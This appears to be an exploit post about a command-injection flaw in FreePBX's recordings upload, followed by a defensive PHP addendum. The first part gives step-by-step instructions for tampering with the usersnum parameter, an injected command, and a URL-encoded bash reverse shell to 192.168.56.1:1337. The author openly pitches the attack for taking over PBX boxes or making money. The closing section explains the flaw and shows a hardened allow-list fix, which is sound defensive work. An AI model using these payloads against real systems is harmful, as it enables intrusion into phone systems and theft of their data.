And again, while the distro is widely used, the Schmoozecom staff are not giving it enough attention;
all they provided for the distro is the fancy Schmoozecom logo and "Developed by schmoozecom" Teraraa :/
Whatever.
FreePBX suffers from another command execution vuln, not so critical, but perhaps many people are going to be interested in it,
as it can be used to dump plaintext data from the PBX box ;)

Actually, as you can see, there are many exploitable lines there, but here I am interested in this line:
system("chmod g+rw ".$destfilename);
If you trace the function flow, you will notice that 'destfilename' gets part of its value from the parameter $_REQUEST['usersnum'].
The function is called via
Target/admin/config.php?type=setup&display=recordings
Before uploading, open Firebug,
search for usersnum,
and edit the value to
fa;id>faris;fax
or, for a back connection, use
fa;bash%20-i%20%3E%26%20%2fdev%2ftcp%2f192.168.56.1%2f1337%200%3E%261;faris
and you are ready to dominate, or even make some $$ if you are interested ;)
Have a good day
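
For anyone patching this, the flaw above is that request data is concatenated unquoted into a shell command line, so the shell treats each `;` as the end of one command and the start of the next. The sketch below is an added example, not code from the post or from FreePBX: it shows the pattern beside a hardened form that allow-lists usersnum and changes the mode without a shell. The function names, the directory, the "-upload.wav" suffix and the digits-only rule for usersnum are assumptions.

```php
<?php
// Added example, not FreePBX code. Function names, the directory and the
// "-upload.wav" suffix are hypothetical; only the system("chmod g+rw ...")
// call and the usersnum parameter come from the post.

// Vulnerable pattern: returns the string that system() would hand to /bin/sh.
function chmod_command_vulnerable(string $destfilename): string
{
    return "chmod g+rw " . $destfilename;
}

// Assumption: usersnum is an extension number, so only digits are allowed.
function usersnum_is_valid(string $usersnum): bool
{
    return preg_match('/\A[0-9]{1,16}\z/', $usersnum) === 1;
}

// Hardened: allow-list the value, then set the mode with no shell involved.
// If a shell call is unavoidable, wrap the path in escapeshellarg() instead.
function chmod_hardened(string $dir, string $usersnum): bool
{
    if (!usersnum_is_valid($usersnum)) {
        return false; // reject outright, do not try to strip characters
    }
    $destfilename = $dir . '/' . $usersnum . '-upload.wav';
    if (!is_file($destfilename)) {
        return false;
    }
    // Same effect as "g+rw": OR the group read/write bits into the mode.
    $mode = fileperms($destfilename) & 0777;
    return chmod($destfilename, $mode | 0060);
}

// Constructed demo data in a throwaway directory.
$dir = sys_get_temp_dir() . '/rec-demo-' . getmypid();
mkdir($dir, 0700);
touch($dir . '/1001-upload.wav');
chmod($dir . '/1001-upload.wav', 0600);
$hostile = 'fa;id>faris;fax'; // the value quoted in the post

echo chmod_command_vulnerable($dir . '/' . $hostile . '-upload.wav'), PHP_EOL;
var_dump(chmod_hardened($dir, '1001'));   // valid extension number
var_dump(chmod_hardened($dir, $hostile)); // fails the allow-list
clearstatcache();
printf("%o\n", fileperms($dir . '/1001-upload.wav') & 0777);

unlink($dir . '/1001-upload.wav');
rmdir($dir);
```

The same review applies to every other system() or exec() call in that function that builds its argument from request data.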